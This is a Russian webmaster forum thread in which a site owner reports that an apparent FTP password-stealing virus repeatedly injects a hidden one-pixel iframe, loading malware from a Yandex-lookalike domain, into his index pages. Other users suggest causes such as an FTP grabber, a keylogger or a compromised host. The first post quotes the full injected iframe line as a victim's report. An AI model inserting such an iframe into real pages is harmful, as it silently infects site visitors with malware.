Такого ФТП взломщика я еще не встречал!

123 4
P
На сайте с 21.08.2008
Offline
65
3024

Работает вирус по стандартной схеме: как-то достает пароль к ФТП, после чего на индексные страницы добавляет <iframe src="http://yanbex.com/yandex/in.cgi?2" width=1 height=1 style="visibility:hidden"></iframe>

Этот iframe подгружает вирус, который, правда, ловит Касперский(как другие антивирусы не знаю).

НО, САМОЕ ГЛАВНОЕ:

Я не могу от него избавится, он каждый день взламывает пароль. Хотя непонятно как?

Пароль нигде не храню. Все они сложные, вида Yhh2UVBrg8Ft и т. п.

Кто-то встречался с таким вирусом??? Как с ним бороться? Уже 3-й день меняю индексные файлы на всех сайтах и пароли к ФТП :gm:

aleksey_php
На сайте с 17.03.2008
Offline
53
#1

Похоже взломан сам хостинг.

P
На сайте с 21.08.2008
Offline
65
#2

Не думаю. К панели тоже менял пароль. Кстати там лежат толко файлы html, php, jpg и gif - больше ничего. Так что взлом по идеи только через фтп😒

Да и вход в панель хостинга вообще через https

ШO
На сайте с 27.12.2005
Offline
375
#3
pianist:
К панели тоже менял пароль.

При чем тут панель, говорят же хостера целиком ломанули скорее всего.

А что за хостер?

Sentoro
На сайте с 18.03.2007
Offline
149
#4
pianist:

Я не могу от него избавится, он каждый день взламывает пароль. Хотя непонятно как?

Пароль нигде не храню. Все они сложные, вида Yhh2UVBrg8Ft и т. п.

Пароль и не надо хранить, достаточно просто соедениться с сервером по фтп, при подключении тырятся пароли.

Проверьте хорошенько комп, ну и напишите в саппорт хостера.

Продается СДЛ на тему инвестирования (http://www.telderi.ru/ru/viewsite/903457)
S
На сайте с 28.10.2005
Offline
312
#5

Тот что ставит код и тот что загружается - наверняка разные вирусы, один ловится каспером, другой, к примеру, сидит на вашей машине

S2
На сайте с 07.01.2008
Offline
611
#6

Вирус не может взломать пароль. Может к вам что-то залили или хостинг дырявый. Или у вас комп заражён, например перехватчик ввода данных с клавиатуры стоит, кейлоггер.

Не надо приписывать мне свои выводы, я имею ввиду только то, что написал. Лучшая партнёрка по футболкам/толстовкам (http://partnerka.kolorado.ru/?ref=1921540) Опрос: Проверить текст на уник - как? (/ru/forum/495885)
Sentoro
На сайте с 18.03.2007
Offline
149
#7
Str256:
Вирус не может взломать пароль. Может к вам что-то залили или хостинг дырявый. Или у вас комп заражён, например перехватчик ввода данных с клавиатуры стоит, кейлоггер.

Скорее фтп граббер, это щас распространено. Которые сделаны "по уму" порой оч. сложно определить.

S
На сайте с 28.10.2005
Offline
312
#8

Это чтобы упредить дальнейшее развитие темы:


"Винда - оцтой!"
"Линукс форева!"
"Каспер всё тормозит, даже пользователя!" :D

malls
На сайте с 08.08.2005
Offline
255
#9
semenov:
"Каспер всё тормозит, даже пользователя!" :D

😂 Все равно его не брошу - потому что он хороший!

E
На сайте с 17.02.2008
Offline
191
#10

Однозначно FTP-граббер. Я такое встречал, когда хранил пароли в FTP-клиенте фар-менеджера.

Точно такой iframe подгружали.

Выбираю прокси здесь: https://goo.su/zUub4. Хотите купить и Вы?
123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий